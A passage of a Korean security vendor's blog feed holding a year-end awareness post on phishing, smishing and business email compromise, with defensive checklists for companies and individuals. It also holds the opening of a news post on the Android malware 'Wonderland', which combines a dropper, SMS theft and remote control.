&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;가족&amp;middot;지인 명의 사칭 문자&amp;middot;메신저 증가&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;특히 스미싱&amp;middot;피싱 메시지는 연말에 정상 알림처럼 위장해 접근하는 경우가 많아, 한 번의 클릭만으로도 계정 탈취&amp;middot;금융 피해로 이어질 수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #006dd7;&quot;&gt;&lt;b&gt;연말에 특히 많이 발생하는 공격 유형&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;연말에 증가하는 사이버 공격 유형은 다양하지만, 공통된 특징이 있습니다. 바로 &amp;lsquo;지금 확인하지 않으면 문제가 생긴다&amp;rsquo;는 심리를 자극한다는 점입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;  기업 대상 주요 위협&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;결재 요청 사칭 이메일(BEC)&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;연말 정산&amp;middot;급여&amp;middot;세무 관련 피싱 메일&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;랜섬웨어 유포용 악성 문서&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;협력사&amp;middot;외주 인력 계정 탈취 후 내부 침투&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;내부자 실수로 인한 문서 유출&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #e7fdb5; color: #333333; text-align: start; font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;  &lt;b&gt;개인 대상 주요 위협&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;택배&amp;middot;카드&amp;middot;정부기관 사칭 스미싱&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;연말 이벤트&amp;middot;경품 당첨 사기&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;가짜 쇼핑몰&amp;middot;결제 페이지 피싱&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;메신저 계정 탈취 후 지인 사칭&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;기업을 대상으로는 결재 요청이나 세무&amp;middot;급여 관련 메일처럼 긴급성을 강조하는 공격이 많고, 개인에게는 택배 지연, 카드 오류, 이벤트 당첨 안내 등 일상과 밀접한 내용으로 접근합니다. 공격자는 기술보다 사람의 심리를 먼저 노립니다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;문제는 이런 공격이 대부분 정상적인 업무 흐름이나 생활 패턴과 매우 유사하다는 점입니다. 그래서 연말에 발생한 보안 사고는 단순한 실수가 아니라, 누구에게나 일어날 수 있는 현실적인 위험으로 이어집니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;연말 보안 사고는 왜 더 치명적일까?&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;연말에 발생한 보안 사고는 평소보다 피해가 커지는 경향이 있습니다. 인력 공백이나 휴가로 인해 초기 대응이 지연되고, 사고 인지 자체가 늦어지는 경우도 많습니다. 내부 커뮤니케이션이 원활하지 않아 대응 과정에서 혼선이 발생하기도 합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;인력 공백으로 초기 대응 지연&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;사고 인지까지 시간이 오래 걸림&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;내부 커뮤니케이션 혼선&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;금전&amp;middot;평판 손실이 다음 해까지 이어짐&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;특히 랜섬웨어나 계정 탈취 사고는 연초 업무가 시작되는 시점까지 영향을 미치며, 다음 해의 업무 연속성과 신뢰도에 직접적인 타격을 줄 수 있습니다. 연말 보안 사고는 &amp;lsquo;그해의 문제&amp;rsquo;로 끝나지 않는 이유입니다&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;지금 점검해야 할 보안 포인트&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이 시점에서 중요한 것은 복잡한 보안 대책이 아니라, 기본적인 점검과 경계입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;✔ 기업 보안 점검 포인트&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;연말 결재&amp;middot;정산 관련 메일 보안 공지 여부&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;외부 반출 문서&amp;middot;권한 관리 점검&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;임원&amp;middot;관리자 계정 MFA 적용 여부&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;랜섬웨어 대응 백업 상태 확인&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;보안 솔루션 업데이트 및 정책 점검&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;기업은 연말 결재&amp;middot;정산 관련 메일에 대한 주의 공지가 이루어지고 있는지, 외부 반출 문서와 계정 권한 관리가 적절히 통제되고 있는지 점검할 필요가 있습니다. 임원&amp;middot;관리자 계정의 다중 인증(MFA) 적용 여부, 백업 상태와 보안 솔루션 업데이트 여부 역시 반드시 확인해야 할 요소입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&amp;nbsp;&lt;/h3&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;✔ 개인 보안 점검 포인트&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;출처 불명 문자&amp;middot;링크 클릭 금지&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;앱 설치 유도 메시지 차단&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;메신저&amp;middot;이메일 계정 보안 설정 확인&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;스마트폰 보안 앱 최신 상태 유지&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;가족&amp;middot;지인 사칭 메시지 전화로 재확인&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;개인 사용자 역시 출처가 불분명한 문자나 링크를 무심코 클릭하지 않는 습관, 앱 설치를 유도하는 메시지에 대한 경계, 메신저&amp;middot;이메일 계정의 보안 설정 점검이 필요합니다. 특히 가족이나 지인 명의를 사칭한 메시지는 반드시 전화나 다른 수단으로 재확인하는 것이 안전합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;연말은 보안의 끝이 아니라, 다음 해를 위한 시작입니다&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;연말은 한 해를 정리하는 시기이지만, 보안 관점에서는 다음 해를 준비하는 출발점이기도 합니다. 공격자는 쉬지 않습니다. 다만 우리가 가장 바쁘고, 가장 방심하는 순간을 기다릴 뿐입니다. 기업과 개인 모두, 지금 이 시점에서 보안을 한 번 더 점검하는 것이 가장 현실적인 연말 대비 전략입니다. 작은 점검 하나가 큰 사고를 막을 수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이스트시큐리티는 연말&amp;middot;연초에 집중되는 사이버 위협에 대비해 지속적인 위협 모니터링과 분석, 보안 대응을 이어가겠습니다. 올 한 해도 보안에 대한 관심과 노력을 해주신 많은 분들께 감사합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;보안 대비 철저히 하시고, 안전하고 편안한 연말 보내시길 바랍니다. 다가오는 새해도 이스트시큐리티가 든든한 보안 파트너로 함께하겠습니다!&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>이스트시큐리티 소식</category>
      <category>개인보안수칙</category>
      <category>기업보안</category>
      <category>보안점검</category>
      <category>연말보안점검</category>
      <category>연말연시</category>
      <category>이스트시큐리티</category>
      <author>알약5</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5694</guid>
      <comments>https://alyacofficialblog.tistory.com/5694#entry5694comment</comments>
      <pubDate>Tue, 30 Dec 2025 10:38:34 +0900</pubDate>
    </item>
    <item>
      <title>안드로이드 악성코드의 발 빠른 진화 - 드로퍼&amp;middot;SMS 탈취&amp;middot;RAT 기능 결합한 &amp;lsquo;Wonderland&amp;rsquo; 확산</title>
      <link>https://alyacofficialblog.tistory.com/5693</link>
      <description>&lt;p style=&quot;text-align: right;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light'; background-color: #eeeeee; color: #333333; text-align: start;&quot;&gt;by 이스트시큐리티 마케팅팀&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;안녕하세요, 이스트시큐리티입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;최근 안드로이드 악성코드 공격 양상이 단순한 정보 탈취 단계를 넘어, 원격 제어&amp;middot;자동 확산&amp;middot;실시간 금융 사기를 모두 수행하는 통합 공격 프레임워크 형태로 빠르게 진화하고 있습니다. 그 중심에 있는 대표적인 사례가 바로 &lt;u&gt;&amp;lsquo;원더랜드(Wonderland)&amp;rsquo;&lt;/u&gt; 악성코드입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 2034384077.png&quot; data-origin-width=&quot;1000&quot; data-origin-height=&quot;417&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/AsAJ3/dJMcac2Jm1I/rOfhyPClXjGlUIpLqrNna1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/AsAJ3/dJMcac2Jm1I/rOfhyPClXjGlUIpLqrNna1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/AsAJ3/dJMcac2Jm1I/rOfhyPClXjGlUIpLqrNna1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FAsAJ3%2FdJMcac2Jm1I%2FrOfhyPClXjGlUIpLqrNna1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1000&quot; height=&quot;417&quot; data-filename=&quot;Group 2034384077.png&quot; data-origin-width=&quot;1000&quot; data-origin-height=&quot;417&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&amp;nbsp;&lt;/h3&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&amp;nbsp;&lt;/h3&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #1b711d;&quot;&gt;&lt;b&gt;드로퍼 기반 위장 설치로 정상 앱처럼 보이는 것이 특징&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;보안 기업 Group-IB 분석에 따르면 Wonderland는 정상 앱으로 위장한 드로퍼(dropper)를 통해 최초 침투를 시도합니다. 기존처럼 설치 즉시 악성 행위를 수행하는 &amp;lsquo;노골적인 트로이목마 APK&amp;rsquo;가 아니라, 겉보기에는 정상 앱처럼 동작하다가 내부에 은닉된 악성 페이로드를 &lt;u&gt;로컬 환경에서 실행&lt;/u&gt;하는 방식입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이 구조는 네트워크 연결 없이도 악성코드 설치가 가능하며, 초기 보안 점검이나 정적 분석을 회피하는 데 매우 효과적입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #1b711d;&quot;&gt;&lt;b&gt;SMS 탈취 + 실시간 RAT 제어 결합 - 금융 사기 자동화&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
